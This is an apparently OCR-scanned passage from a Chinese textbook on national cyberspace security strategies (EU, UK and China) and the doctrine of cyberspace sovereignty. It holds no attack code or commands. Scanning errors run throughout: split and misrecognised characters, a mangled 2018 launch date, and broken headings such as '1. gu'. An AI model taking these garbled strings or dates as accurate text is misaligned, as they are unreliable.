络 犯罪 ,欧盟 制定 实施 了 相关 法 规 并 支持 业务 合作 ,这 也 是 欧盟 当前 网 络 安全 战略 的 一 部 
分 。2013 年 1 月 ,欧盟 在 其 下 属 的 欧盟 刑警 组 织 成 立 了 欧洲 网 络 犯罪 中 心 ,以 保护 欧洲 民 
众 和 企业 不 受 网 络 犯罪 侵害 。 欧 盟 委员 会 2014 年 11 月 公布 了 新 的 网 络 安全 战略 ,全 面 对 
预防 和 应 对 网 络 中 断 和 袭击 提出 规划 ,以 确保 数字 经 济 安全 发 展 。 欧 盟 把 提升 网 络 的 抗 打 
击 能 力 ,大 幅 减少 网 络 犯罪 ,在 欧盟 共同 防务 的 框架 下 制定 网 络 防 御 政策 和 发 展 防御 能 力 、 
发 展 网 络 安全 方面 的 工业 和 技术 ,为 欧盟 制定 国际 网 络 空间 政策 作为 5 项 优先 工作 。 新 战 
略 提出 立法 建议 并 要 求 关键 机 构 在 遭受 网 络 袭 击 时 要 迅速 向 欧盟 汇报 ,包括 重要 基础 设施 
的 提供 商 、 关 键 的 网 络 企业 及 公共 行政 部 门 。 欧 盟 还 要 求 各 成 员 国 制定 相应 战略 ,成 立 专门 
机 构 ,以 预防 和 处 理 网 络 安全 风险 和 事故 ,并 与 欧盟 委员 会 共享 早期 风险 预警 信息 。 


1.3.4 英国 网 络 空间 安全 国家 战略 


英国 的 网 络 建设 和 信息 化 发 展 很 快 ,已 经 处 于 世界 先进 水 平 。2000 年 ,英国 首相 布 莱 
尔 推动 创建 了 “电子 英国 ”计划 , 即 以 信息 化 带动 英国 经 济 和 社会 的 发 展 。 英国 政府 高 度 重 
视 信息 安全 ,从 2009 年 到 2011 年 ,连续 两 次 出 台 了 国家 网 络 安 全 战略 。2011 年 11 月 25 
日 发 布 的 (英国 网 络 安 全 战略 ) 提 出 未 来 4 年 的 战略 计划 以 及 切实 的 行动 方案 ,对 英国 信息 
安全 建设 做 出 了 战略 部 署 和 具体 安排 。《 英 国 网 络 安全 战略 ) 的 总 体 愿景 是 在 包括 自由 、 公 
平 、 透 明和 法 治 等 核心 价值 观 基础 上 ,构建 一 个 充满 活力 和 恢复 力 的 安全 网 络 空 间 , 并 以 此 
促成 经 济 大 规模 增长 以 及 产生 社会 价值 ,通过 切实 行动 促进 经 济 繁荣 、 国 家 安全 以 及 社会 稳 
定 。 其 设立 的 4 个 战略 目标 分 别 为 : 应 对 网 络 犯罪 ,使 英国 成 为 世界 上 商业 环境 最 安全 的 
网 络 空间 之 一 ;使 英国 面 对 网 络 攻击 的 恢复 力 更 强 , 并 保护 其 在 网 络 空间 中 的 利益 ;帮助 塑 
造 一 个 可 供 英 国 大 众 安全 使 用 的 、 开 放 的 、 稳 定 的 、 充 满 活 力 的 网 络 空间 ,并 进一步 支撑 社会 
开放 ;构建 英国 跨 层面 的 知识 和 技能 体系 ,以 便 对 所 有 的 网 络 安 全 目标 提供 基础 支持 。 在 网 
络 战 方面 ,英国 成 立 了 国家 网 络 安全 办 公 室 , 直 接 对 首相 负责 ,主要 负责 制定 战略 层面 的 网 
络 战 力量 发 展 规划 和 网 络 安全 行动 纲要 。 英 国 网 络 战 部 队 主要 有 网 络 安全 行动 中 心 和 网 络 
作战 集团 ,前 者 隶属 于 国家 通信 情报 总 局 ,负责 监控 互联 网 和 通信 系统 ,维护 民用 网 络 系统 ， 
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以 及 为 军 方 网 络 战 行动 提供 情报 支援 ;后 者 隶属 于 英国 国防 部 ,主要 负责 英 军 网 络 战 相关 训 
练 与 行动 规划 ,并 协调 军 地 技术 专家 对 军事 网 络 目标 进行 安全 防护 。2015 年 8 月 ,英国 ( 卫 
报 》 报 道 ,英国 知名 手机 零售 商 * 汽 车 手机 仓库 ?日 前 承认 最 近 遭 到 “蓄意 策划 ”的 网 络 黑客 绪 
击 , 这 家 在 欧洲 各 市 有 上 千家 分 店 ,导致 大 约 240 万 用 户 的 个 人 信息 及 9 万 用 户 的 信用 卡 资 
料 泄露 ,相关 网 站 的 信息 也 可 能 遭 到 黑客 破坏 。 英 国信 息 监 管 局 接 到 报案 后 ,开始 联合 警方 
展开 调查 。 英 国政 府 反应 迅速 ,立即 适时 推出 一 个 总 额 6. 5 亿 英镑 的 “网 络 安全 战略 ”, 意 在 
整体 提升 国家 的 网 络 安全 水 平 ,净化 和 优化 民众 的 上 网 环境 ,为 公司 和 个 人 的 网 络 安全 信息 
数据 构筑 一 道 安全 屏障 ,这 是 英国 网 络 安 全 战略 民用 化 的 新 动向 。 


1.3.5 我 国 网 络 空间 安全 国家 战略 


随 着 网 络 空间 对 政治 、 经 济 .军事 .科技 和 文化 等 领域 的 全 面 渗透 ,其 国家 战略 重要 性 日 
益 提升 ,被 称 为 继 陆 \ 海 、 空 太空 之 外 的 “第 五 空间 ”, 是 人 类 活动 的 新 领域 .《 中 华人 民 共 和 
国 国家 安全 法 ) 首 次 从 法 律 层 面 正式 提出 “国家 网 络 空 间 主 权 ” 这 一 概念 ,将 其 纳入 国家 主权 
不 可 分 割 的 重要 组 成 部 分 ;《 中 华人 民 共 和 国 网 络 安全 法 ) 也 将 维护 网 络 空 间 主权 和 国家 安 
全 作为 立法 目的 。 国 家 网 络 空间 主权 是 国家 主权 在 网 络 空间 的 拓展 和 延伸 ,是 国家 主权 的 
重要 组 成 部 分 ,是 进行 基础 设施 建设 .技术 合作 、 经 贸 服务 .信息 共享 \ 人 文 交流 的 重要 前 提 ， 
是 国家 在 信息 领域 的 权益 不 受 侵犯 的 权力 保障 。 尊 重 网 络 空间 主权 ,维护 网 络 安全 ,谋求 共 
治 ,实现 共 赢 ,正在 逐渐 成 为 国际 社会 共识 。 

目前 ,我 国 尚 处 于 “空间 网 络 ” 建 设 的 初级 阶段 ,需要 我 们 继续 坚持 不 懈 、 刻 苦 攻 关 。 
2018 4 3 H 30 日 ,长 征 三 号 乙 / 远 征 一 号 运载 火箭 托 举 北斗 全 球 卫星 导航 系统 的 两 颗 卫 星 
在 西昌 卫星 发 射 中 心 成 功 发 射 。 本 次 发 射 是 北斗 全 球 卫星 导航 系统 的 第 4 次 发 射 , 是 该 系 
统 的 第 7 颗 卫 星 和 第 8 颗 卫 星 ,也 是 我 国 发 射 的 第 30 颗 和 第 31 颗 北 斗 卫星 。 次 日 ,我 国 在 
太原 卫星 发 射 中心 成 功 以 “一 箭 三 星 ” 方 式 发 射 3 颗 光 学 卫星 。 这 也 是 我 国 成 功 发 射 并 将 投 
入 使 用 的 首 个 民用 业务 卫星 星座 。 新 时 代 , 新 伟业 ,我 国 天 地 一 体 化 信息 网 络 建设 号 角 已 吹 
响 , 网 络 安全 任 重 而 道 远 , 须 在 网 络 空 间 战略 统一 规划 下 运用 国家 战略 思维 ,全 力 保 障 天 地 
一 体 空间 网 络 安全 。 天 地 悠悠 ,浩瀚 宇宙 ,未 知 与 已 知 同 在 ,挑战 和 机 遇 并 存 , 在 新 时 代 的 科 
学 春天 里 ,我们 比 以 往 更 加 强烈 地 需要 弘扬 科学 家 追求 真理 \ 永 无 止境 的 探索 精神 ,更 加 强 
烈 地 需要 敢于 自信 、 敢 于 坚守 、 敢 为 人 先 , 坚 信 在 不 久 的 将 来 ,我 们 将 克服 重重 困难 ,建成 一 
个 强大 的 、 安 全 的 、 稳 定 的 、 全 球 化 的 天 地 一 体 化 信息 网 络 ,造福 全 世界 ,服务 全 人 类 。 确 立 
网 络 空间 主权 的 机 遇 、 挑 战 及 根本 目标 如 下 。 

1. gu 

(1) 信息 技术 的 发 展 拓展 人 类 活动 的 新 空间 ,以 网 络 化 和 数字 化 为 核心 的 信息 技术 的 
应 用 和 普及 是 人 类 社会 从 工业 时 代 向 信息 时 代 转 变 的 标志 。 信 息 技术 的 应 用 以 惊人 的 速度 
改变 着 人 们 的 工作 、 生 活 和 思维 的 方式 ,社会 生活 的 数字 化 和 智能 化 带 来 了 新 的 产业 革命 和 
制度 革命 。 信 息 技术 的 普及 与 应 用 拓展 了 人 们 的 生活 空间 ,人 们 的 生产 和 生活 向 网 络 空间 
转移 ,这 成 为 政府 进行 网 络 空 间 治理 的 依据 。 网 络 空 间 正 逐渐 成 为 国家 主权 的 新 疆域 ,其 存 
在 是 网 络 空间 主权 存在 的 前 提 。 

(2) 大 数据 时 代 对 网 络 信息 安全 的 必然 要 求 是 大 数据 时 代 面 临 的 最 重要 问题 ,信息 汇 
露 、 网 络 病毒 .黑客 攻击 、 系 统 漏 洞 等 各 种 人 为 或 非 人 为 的 安全 问题 成 为 信息 技术 应 用 发 展 
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的 阻碍 。 数 据 在 收集 ,加 工 、 存 储 、 传 输 过 程 中 也 面临 诸多 网 络 安全 威胁 ,确保 网 络 信息 安全 
已 经 成 为 维护 国家 安全 的 现实 需求 。 大 数据 时 代 背 景 下 ,网 络 空间 被 纳入 国家 疆域 的 范畴 ， 
网 络 空间 安全 也 随 之 成 为 国家 安全 的 重要 组 成 部 分 ,没有 网 络 安全 就 没有 国家 安全 。 一 方 
面 , 随 着 物 联网 的 普及 ,国家 关键 信息 基础 设施 接 入 互联 网 ,网 络 空 间 特种 作战 联通 了 虚拟 
与 现实 ,使 网 络 空 间 成 为 名 副 其 实 的 看 不 见 的 战场 ; 另 一 方面 ,网 络 攻 击 、 网 络 窃 密 、 散 布 违 
法 有 害 信息 等 多 种 网 络 违 法 犯罪 行为 对 国家 网 络 空间 主权 与 安全 构成 了 极 大 挑战 。 从 国家 
安全 战略 的 角度 出 发 ,为 维护 国家 网 络 空间 战略 发 展 利益 ,网 络 信息 安全 必然 成 为 大 数据 发 
展 不 可 或 缺 的 一 环 。 

(3) 网 络 空间 主权 的 主张 成 为 国际 社会 共识 ,国际 社会 在 网 络 空间 治理 必要 性 问题 上 
已 经 达成 了 一 致意 见 ,虽然 针对 网 络 主权 问题 上 还 存在 分 歧 , 但 是 这 种 争论 正在 往 积极 方面 
发 展 。 随 着 网 络 空间 发 展 形势 的 变化 ,各 国 主权 意识 逐渐 增强 ,一 些 主 权 国 家 已 开始 对 国内 
的 网 络 空间 进行 治理 ,并 呼吁 国际 社会 在 此 领域 进行 合作 。 网 络 空间 主权 的 支持 与 论 正 逐 
步 发 展 壮大 ,网 络 空间 主权 的 主张 正 逐 步 得 到 国际 社会 的 认同 ,为 网 络 空间 主权 理论 的 发 展 
在 观念 上 提供 了 支撑 。 一 方面 ,由 于 网 络 空间 国家 安全 ,社会 与 经 济 领 域 问 题 凸 显 ,网 络 空 
间 自 由 主义 ,全球 公 域 论 .新 主权 论 及 “多 利益 做 关 方 ”互联 网 治理 模式 说 等 反对 网 络 主权 的 
观点 不 断 受到 质疑 与 冲击 ; 另 一 方面 ,由 于 网 络 空 间 对 政治 ,经济 军事、 科技 和 文化 等 现实 
世界 各 领域 全 面 渗透 ,使 其 成 为 世界 各 国 角逐 的 主 战场 ,各 国 通过 信息 基础 设施 建设 打造 网 
络 空间 的 目的 也 不 再 是 最 初 的 信息 交流 ,而 是 形成 本 国政 治 、 经 济 和 文化 的 基石 ,各 国 争 相 
在 此 新 领域 上 主张 权利 ,维护 自身 利益 ,抓紧 形成 网 络 空间 的 话语 权 。 各 种 迹象 表明 ,国际 
社会 对 网 络 空间 治理 的 主张 有 趋同 之 势 , 即 实现 本 国 的 安全 与 自由 ,这 为 网 络 主权 理论 提供 
了 极 大 的 发 展 空间 。 

(4) 国家 互联 网 空间 治理 能 力 的 提升 与 推进 随 着 信息 技术 的 发 展 ,互联 网 空间 治理 体 
系 得 到 不 断 完善 ,治理 能 力 得 到 不 断 提升 。 通 过 强化 网 络 空间 安全 人 才 培 养 与 力量 建设 , 互 
联网 核心 技术 实现 了 突破 ,同时 ,通过 积极 推动 网 络 社会 治理 创新 ,网 络 安全 维护 能 力也 得 
到 不 断 提升 ,为 维护 网 络 空间 主权 提供 了 技术 支持 与 治理 能 力 保障 。 我 国 围绕 建设 网 络 强 
国 的 目标 ,坚持 依法 治 网 的 理念 ,加 强 联合 管 治 ,创新 网 络 空间 治理 方式 ,努力 构建 网 络 空间 
综合 防 控 体系 ,强化 关键 信息 基础 设施 和 大 数据 安全 防护 ,加 强 信息 网 络 安全 防护 机 制 建 
设 , 采 用 新 思路 、 新 方法 ,在 探索 中 建立 符合 互联 网 发 展 规律 的 中 国 特色 互联 网 治理 模式 ,这 
为 我 国 主张 网 络 空 间 主权 奠定 了 重要 基础 。 

(5) 国家 对 网 络 主权 的 高 度 重视 与 政策 支持 ,国家 网 络 空间 主权 的 确立 是 进行 基础 设 
施 建 设 .技术 合作 、 经 贸 服务 、 信 息 共 享 、 人 文 交 流 的 首要 前 提 , 是 国家 在 信息 领域 的 权益 不 
受 侵犯 的 权力 保障 ,也 是 完善 网 络 空间 法 治 体系 的 法 理 依据 。 网 络 空间 安全 形势 严峻 ,国家 
对 网 络 主权 的 高 度 重视 与 政策 支持 构成 了 维护 网 络 空间 主权 的 重要 保证 。 近 年 来 ,党 和 国 
家 对 网 络 空间 安全 的 重视 程度 不 断 增强 ,党 在 十 八大 报告 中 首次 提出 了 “高 度 关 注 网 络 空间 
安全 ”, 将 网 络 空间 安全 提高 到 党 和 国家 层面 ;党 的 十 八 届 三 中 全 会 决定 成 立国 家 安全 委员 
会 ,强调 高 度 重视 “网 络 和 信息 安全 ”, 青 一 次 强调 了 网 络 信 息 安 全 的 重要 性 ;( 国 家 网 络 空间 
安全 战略 》 首 次 发 布 ,再 次 彰显 国家 对 网 络 空间 安全 维护 的 重视 。 另 一 方面 ,通过 “互联 
网 十 ”行动 计划 《关于 促进 互联 网 金融 健康 发 展 的 指导 意见 兴 促 进 大 数据 发 展 行动 纲要 ) 等 
相关 文件 与 政策 ,国家 更 加 明确 了 维护 网 络 空间 主权 、 促 进 经 济 社会 发 展 上 的 坚定 态度 。 新 
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《国家 安全 法 ) 首 次 正式 从 立法 层级 提出 “国家 网 络 空间 主权 ”的 概念 ,将 其 纳入 国家 主权 不 
可 分 割 的 重要 组 成 部 分 。 这 些 都 为 维护 国家 网 络 空 间 主权 奠定 了 法 律 与 政策 基础 。 

2. 挑战 

(1) 网 络 空间 的 合法 权利 遭遇 挑战 。 随 着 信息 化 的 普及 ,互联 网 已 经 渗透 至 政治 、 经 
济 、 军 事 、 文 化 和 意识 形态 等 领域 。 然 而 .全球 互联 网 治理 体系 尚未 完善 ,治理 能 力 有 待 提 
升 ,治理 漏洞 随处 可 寻 , 使 得 全 球 范围 内 网 络 空 间 的 合法 权益 遭 到 严重 挑战 。 一 方面 ,信息 
强国 妄图 利用 意识 形态 斗争 或 假借 维护 本 国 网 络 安全 的 名 义 侵犯 信息 弱 国 合法 权益 的 情形 
屡见不鲜 ,捏造 虚假 言论 负面 舆情 干扰 正常 市 场 行为 的 情况 比比 皆 是 ,这 些 均 对 网 络 空间 
合法 权益 构成 了 极 大 的 挑战 ; 另 一 方面 ,当前 网 络 主权 概念 本 身 在 国际 社会 仍 存在 争议 , 信 
息 大 国之 间 对 此 争论 不 休 。 事实 上 , 正 是 基于 网 络 空 间 主 权 和 国家 安全 本 身 极其 重要 的 地 
位 , 才 导 致 各 国 的 意见 分 歧 。 各 国 在 网 络 空间 主权 与 网 络 自由 原则 上 达成 统一 的 共识 还 需 
长 期 的 政治 博弈 , 面 对 我 国 网 络 安全 局 势 复杂 ,网 络 空间 安全 防护 乏力 ,网 络 空间 治理 体系 
不 完善 的 现状 ,确立 与 维护 网 络 空间 主权 成 为 保障 网 络 安全 与 加 强 网 络 空间 治理 的 首要 
任务 。 

(2) 网 络 攻击 威胁 国家 安全 。 互 联网 技术 是 一 把 双 刃 剑 , 在 带 来 信息 交互 传播 与 通信 
便利 的 同时 ,也 极 易 引发 网 络 攻击 与 威胁 ,危及 国家 网 络 空间 安全 。 物 联网 .工业 互联 网 和 
人 工 智能 技术 的 普及 ,使 互联 网 系统 成 为 网 络 攻击 的 目标 。 随 着 网 络 武器 的 泛滥 和 网 络 攻 
击 的 服务 化 ,网 络 犯罪 和 网 络 恺 怖 大 行 其 道 , 给 网 络 空间 安全 造成 了 极 大 威胁 。 网 络 攻击 、 
网 络 诈骗 .网络 黄 赌 毒 . 网 络 暴 恐 .网 络 谣言 等 网 络 违法 行为 屡禁不止 ,新 型 网 络 犯罪 成 为 虚 
拟 空间 的 主要 犯罪 类 型 ,严重 危害 人 们 的 人 身 和 财产 利益 。 此 外 ,网 络 强国 对 他 国 进行 “网 
络 自由 ”概念 输出 的 同时 ,还 通过 技术 和 政府 管理 手段 加 大 对 网 络 空间 的 实质 性 管控 ,如 对 
内 加 强 对 国民 的 网 络 信息 监控 ,对 外 开展 网 络 空间 军事 和 情报 刺探 活动 ,这 些 不 法 行为 对 他 
国 国 家 安全 造成 了 极 大 威胁 。 网 络 安全 的 含义 已 超出 网 络 本 身 的 安全 ,很 大 程度 上 体现 为 
国家 安全 、 社 会 安全 .基础 设施 安全 和 人 身 财产 安全 ,依法 维护 我 国 网 络 安全 ,规范 网 络 秩序 
已 势 在 必 行 。 

(3)“ 全 球 公 域 论 ” 挑 战国 家 主权 。 基 于 网 络 信息 传播 的 全 球 性 ,网 络 空 间 被 贴 上 了 “无 
国界 性 ”与 “ 超 领 土 性 ”的 标签 。 然 而 ,技术 上 的 可 跨越 性 并 不 能 成 为 网 络 空间 无 国界 或 超 
领土 的 理由 。 为 了 确立 在 全 球 互联 网 空间 的 绝对 控制 权 , 互 联网 强国 一 直 宣 扬 互 联网 的 “全 
球 公 域 性 ”, 目 的 是 为 消除 其 推行 网 络 自由 价值 观 的 障碍 ,建立 互联 网 国际 竞争 中 的 战略 优 
势 。“ 全 球 公 域 论 ”" 宣 扬 将 网 络 空 间 视 为 与 公海 、 外 层 空 间 类 似 的 国际 空间 ,不 为 任何 国家 所 
支配 ,不 属于 国家 主权 内 事务 ,不 能 主张 国家 主权 。 此 理论 对 我 国 主张 的 网 络 空间 主权 构成 
挑战 ,破坏 了 双方 就 网 络 空间 治理 开展 国际 合作 的 基础 ,对 国家 主权 构成 挑战 。 网 络 主权 符 
合 绝 大 多 数 国 家 利益 ,我国 坚 决 捍 卫 网 络 空间 主权 ,建设 网 络 强国 。 

(4) 网 络 疆界 的 划 定 制约 主权 范围 。 确 定 网 络 空间 主权 存在 的 边界 是 从 网 络 空间 的 形 
成 到 网 络 空间 主权 的 确立 过 程 中 无 法 回避 的 关键 性 问题 。 网 络 空间 主权 依附 于 网 络 疆界 。 
网 络 疆界 的 划 定 制约 网 络 空间 主权 范围 。 网 络 空间 是 非 传统 领域 疆界 的 空间 ,关于 网 络 空 
间 的 法 律 属性 及 国家 对 网 络 空间 的 权力 行使 ,各 国立 场 及 观点 过 异 , 网 络 空间 主权 的 确定 决 
定 国家 对 网 络 空间 的 基础 设施 以 及 信息 内 容 的 管辖 权 与 对 外 防御 权 的 合理 性 。 主 张 国 家 领 
网 主权 首先 必须 制定 网 络 疆界 的 划分 标准 .再 据 此 划分 出 网 络 空间 主权 行使 的 范围 。 网 络 
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主权 空间 范围 应 包含 "有形 ”与 无形? 两 方面 。 一 方面 ,国家 对 有 形 地 理 疆界 内 的 信息 基础 
设施 的 设立 和 运行 具有 管辖 权 ,任何 对 该 疆界 范围 内 的 信息 基础 设施 的 入 侵 都 被 视 为 对 网 
络 空间 主权 的 侵犯 ; 男 一 方面 ,国家 对 通过 防火 墙 、 密 码 系 统 、 动 态 保护 的 入 侵 检 测 系统 等 网 
络 技术 设立 的 无 形 疆界 内 的 信息 的 流通 行为 具有 管辖 权 , 非 法 进入 的 行为 也 将 被 视 为 对 网 
络 空间 主权 的 侵犯 。 

3. 根本 目标 

CD 奠定 国家 网 络 空间 治理 的 合法 性 基础 ,明确 网 络 空间 的 主权 属性 是 国家 进行 网 络 
空间 治理 的 合法 性 基础 。 近 年 来 ,国家 不 断 从 立法 层面 完善 网 络 空间 的 法 律 制度 ,加 强 网 络 
空间 安全 的 顶层 制度 设计 ,网 络 空间 法 律 体系 建设 相对 滞后 的 问题 正在 逐步 得 到 改善 。 确 
立 网 络 空间 主权 旨 在 通过 一 系列 网 络 空间 安全 规范 与 制度 的 构建 商定 国家 网 络 空间 治理 的 
合法 性 基础 。 确 立 网 络 空间 主权 ,完善 网 络 安全 法 律 法 规 , 加 快 网 络 安全 体系 建设 ,全 面 增 
强 网 络 安 全 防御 能 力 与 网 络 空 间 综合 治理 能 力 ,通过 制度 建设 进一步 推动 网 络 空间 治理 法 
治 化 。 

(2) 维护 国家 网 络 空 间 安 全 。 网 络 空 间 是 国家 主权 所 及 的 领域 ,没有 网 络 安全 就 没有 
国家 安全 ,维护 国家 网 络 空间 安全 是 确立 网 络 空间 主权 的 根本 目的 。 网 络 空间 主权 作为 国 
家 主权 的 重要 组 成 部 分 ,不 容 侵犯 。 中 国 主张 网 络 空间 主权 平等 ,提倡 各 国 在 网 络 空间 依法 
独立 行使 国家 主权 ,以 达到 维护 国家 网 络 空间 和 平安 全 之 目的 ,中 国 反 对 以 任何 方式 .任何 
名 义 对 他 国 主权 空间 的 干涉 。 当 前 中 国 网 络 空间 治理 与 管控 能 力 还 较 弱 ,网 络 安 全 人 才 不 
足 , 民 众 网 络 安全 意识 薄弱 ,网 络 空间 重大 危机 处 置 机制 缺 乏 , 网 络 空间 安全 力量 还 需 不 断 
建设 ,维护 国家 网 络 空间 安全 任重道远 。 

G) 实现 建设 网 络 强国 的 战略 目标 。 随 着 互联 网 和 信息 化 工作 的 推进 ,我 国 网 民 数 量 
居 世 界 第 一 ,已 成 为 世界 互联 网 大 国 。 建 设 互联 网 强国 的 国家 战略 ,除了 发 展 数字 经 济 , 加 
强 基础 设施 建设 ,提升 互联 网 创新 能 力 , 增 强 产 业 实力 外 ,还 需要 加 强 网 络 空间 安全 保障 机 
制 建设 , 筑 牢 网 络 安全 防线 。 确 定 网 络 空间 主权 是 建设 网 络 强国 战略 目标 实现 的 前 提 , 只 有 
确立 国家 对 网 络 空间 的 主权 , 牢 牢 掌握 网 络 空间 治理 权 , 才 能 通过 技术 法律 等 实现 网 络 强 
国 的 战略 目标 。 为 实现 这 一 战略 目标 ,首先 ,需要 * 强 基础 ,提升 网 络 基础 设施 ,鼓励 自主 创 
新 能 力 ,全 面 发 展 数字 经 济 ,加 快 网 络 信息 应 用 社会 化 ,改变 互联 网 领域 核心 关键 技术 受制 
于 人 的 局 面 ;其 次 ,需要 “ 强 安全 ”, 通 过 制定 法 律 、 创 新 技术 、 培 育 人 才 等 途径 提升 网 络 空 间 
安全 保障 机 制 建设 ,确保 网 络 空 间 有 章 可 循 ,抵御 网 络 攻击 、 攻 克 技 术 漏 洞 ; 青 次 ,需要 “ 强 意 
识 ”, 提 升 民 众 网 络 主权 意识 、 危 机 应 对 意识 与 能 力 。 

(4) 推动 建立 开放 有 序 的 国际 合作 机 制 。 网 络 空间 治理 国际 合作 面临 着 网 络 主权 存在 
与 否 的 争议 .网络 主权 的 范围 界定 标准 不 确定 、 网 络 主权 实现 路 径 不 明确 等 客观 问题 ,但 同 
时 网 络 技 术 发 展 的 国际 平衡 、 国 家 间 意 识 形 态 的 融合 以 及 网 络 空 间 治理 中 存在 利益 共同 点 
又 为 国际 合作 提供 了 现实 基础 。 国 际 网 络 治理 仅 靠 一 国之 力 无 法 完成 ,我 国 主张 在 尊重 网 
络 主权 的 基础 上 ,维护 网 络 安全 ,促进 开放 合作 ,构建 良好 秩序 。 首 先 ,确保 信息 自由 流通 ， 
市 场 自 由 运行 ,各 国共 同 解决 网 络 空间 难题 ,公平 参与 治理 ,反对 网 络 空间 霸权 主义 ,各 国 提 
高 开放 水 平 ,优势 互补 ,共同 发 展 ;其 次 ,鼓励 双边 多边 的 互联 网 国际 交流 合作 ,在 打击 网 络 
犯罪 ,应 对 国际 网 络 安全 危机 、 防 控 网 络 忍 暴 等 方面 深入 合作 ,形成 互利 共 赢 的 国际 网 络 空 
间 命 运 共同 体 ; 再 次 ,建立 和 完善 网 络 空间 安全 规范 ,加强 互 联网 领域 立法 ,完善 网 络 信息 服 
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务 、 网 络 安全 保护 、 网 络 社会 管理 等 方面 的 法 律 法 规 , 依 法 规范 网 络 行为 ,确保 网 络 空间 有 序 

G) 积极 参与 国际 网 络 规则 体系 的 构建 。 确 立 网 络 空间 主权 是 参与 国际 网 络 规则 体系 
构建 的 前 提 , 面 对 复杂 的 国际 环境 ,中 国 在 国际 网 络 规则 体系 受 重 视 程度 不 够 的 情况 下 ,应 
积极 承担 国际 义务 ,积极 参与 国际 网 络 规则 体系 的 构建 。 我 国 应 通过 多 种 途径 参与 国际 网 
络 规则 制定 ,推动 各 方 切实 遵守 和 平 解决 争端 ,不 使 用 或 威胁 使 用 武力 等 国际 关系 基本 准 
则 ,提出 中 国 主张 ,发 出 中 国 声音 ,提升 我 国 在 国际 网 络 规则 体系 构建 中 的 话语 权 与 影响 力 。 
互联 网 全 球 治 理 体系 需要 变革 ,世界 需要 的 是 一 个 开放 、 合 作 、. 和 平 与 安全 的 网 络 空间 ,未 来 
的 国际 网 络 规则 应 当 是 开放 ,包容 .透明 和 民主 的 。 国 际 网 络 规则 的 构建 应 当 建立 在 国家 主 
权 的 基础 上 ,需要 国际 社会 “求同存异 ”, 开 创 思维 ,尝试 新 方法 ,加 强国 际 对 话 , 深 入 合作 , 增 
加 互信 ,平衡 各 方 利益 ,以 谋求 国际 网 络 空 间 治理 的 共 赢 局 面 。 

网 络 空 间 的 兴起 对 世界 各 国 的 经 济 、 政 治 、 文 化 产生 了 巨大 影响 ,中 国 结合 本 国 国 情 出 
台 了 相关 政策 并 做 出 战略 规划 ,明确 了 网 络 空间 发 展 的 计划 和 任务 。 中 国 呼 吁 世界 各 国 在 
互相 尊重 网 络 空间 主权 的 基础 上 ,加 强 合作 ,平等 治理 ,共同 构建 网 络 空间 治理 的 国际 规则 。 

(1) 尊重 国家 网 络 空间 主权 原则 。 

网 络 空间 主权 是 国家 主权 在 网 络 空间 的 体现 ,神圣 不 可 侵犯 。 不 论 国 家 大 小 、 贫 富 , 一 
律 主权 平等 ,都 平等 地 享有 包括 网 络 平等 权 、 网 络 独立 权 、 网 络 自卫 权 及 网 络 安全 权 在 内 的 
网 络 空间 主权 。 网 络 空间 主权 原则 要 求 反 对 任何 国家 任何 形式 的 网 络 霸权 ,国家 独立 自主 
地 对 领 网 内 的 信息 通信 设施 和 活动 行使 管理 ,监督 等 权利 ,国家 有 权 自 主 按照 本 国 的 情况 确 
定 网 络 管理 制度 ,有 权 采 取 必 要 措施 防止 网 络 人 侵 、 保 护 网 络 信息 有 序 流 通 , 以 维护 网 络 空 
间 秩 序 , 有 权 惩 罚 危 害 网 络 空间 的 行为 任何 国家 不 得 侵犯 他 国 网 络 安全 ,所 有 打 着 "网 络 自 
由 “全 球 公 域 ”及 “国际 空间 论 ” 的 蛋 子 ,实质 上 却 干 涉 他 国 领 网 主权 的 行为 都 是 侵犯 他 国 网 
络 空间 主权 。 任 何 国家 或 个 人 利用 网 络 对 他 国 进行 网 络 入 侵 、 破 坏 等 行为 都 将 被 视 为 对 网 
络 空间 主权 的 侵犯 ,国家 有 权 基 于 网 络 空间 主权 原则 自主 决定 以 一 定 的 手段 实施 抵御 。 

(2) 和 平 利用 网 络 空间 原则 。 

关键 信息 基础 设施 遭受 攻击 、 网 络 恺 怖 主义 活动 以 及 网 络 违法 犯罪 活动 猩 狐 是 各 国 普 
所 面临 的 网 络 安全 风险 和 威胁 ,和 平 利用 网 络 空间 是 各 国 必 须 遵守 的 基本 原则 。 和 平 利用 
网 络 空间 原则 要 求 各 国 相互 包容 与 尊重 ,坚决 遏制 网 络 空间 军备 竞赛 ,防范 与 降低 网 络 空间 
冲突 ,不 得 使 用 武力 ,不 得 将 网 络 信息 用 于 非 和 平 用 途 ,一 国 不 得 以 维护 本 国 国 家 安全 等 任 
何 理由 对 他 国 网 络 空间 进行 网 络 信 侵 、 信 息 窃 取 。 和 平 利用 网 络 空间 ,推动 网 络 空间 的 和 
平安 全 、 开 放 、 合 作 、 有 序 发 展 ,共同 构建 网 络 空间 “利益 共同 体 ” 是 世界 和 平 发 展 的 大 势 所 
趋 , 中 国 在 和 平 利用 网 络 空 间 的 方面 已 经 做 出 示范 。 各 国 应 始终 秉持 和 平平 等 利用 网 络 空 
间 的 原则 ,和 平 解决 国际 网 络 空 间 冲突 与 对 抗 ,以 负责 任 的 态度 参与 国际 网 络 空 间 治理 , 尊 
重 各 国 主权 与 国家 利益 ,求同存异 ,共同 促进 国际 网 络 空 间 健康 、 和 谐 发 展 。 

(3) 依法 治理 网 络 空间 原则 。 

依法 治理 网 络 空间 是 网 络 空间 主权 的 重要 原则 。 治 理 网 络 空间 首先 要 有 法 可 依 , 国 家 
首先 应 科学 立法 ,构建 网 络 空间 治理 规范 体系 。 网 络 空间 虽然 具有 虚拟 性 .开放 性 、 共 享 性 、 
易 受 攻击 性 等 特征 ,但 绝 非法 外 之 地 。 依 法 治理 网 络 空间 ,需要 建立 科学 的 网 络 空间 法 律 规 
范 体系 ,同时 还 需 积极 开展 标准 制定 ,保证 规范 的 进度 与 网 络 发 展 的 速度 一 致 ,甚至 适当 超 
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前 ,通过 弥补 漏洞 .减少 规章 冲突 等 方式 整合 网 络 法 律 规范 。 依 法 治理 网 络 空间 ,构建 网 络 
空间 良好 秩序 ,确保 信息 自由 流通 ,网 络 主体 隐私 等 合法 权益 能 够 得 到 全 面 保障 ,违法 犯罪 
行为 得 到 全 面 规制 ,全 面 推进 网 络 空间 法 治 化 进程 ,让 互联 网 在 法 治 轨道 上 健康 运行 ,依法 
构建 良好 的 网 络 空间 秩序 。 

(4) 反对 网 络 霸权 主义 原则 。 

网 络 霸权 主义 是 指 网 络 强国 利用 其 网 络 实力 或 优势 ,强行 介入 .干扰 ,甚至 控制 他 国 网 
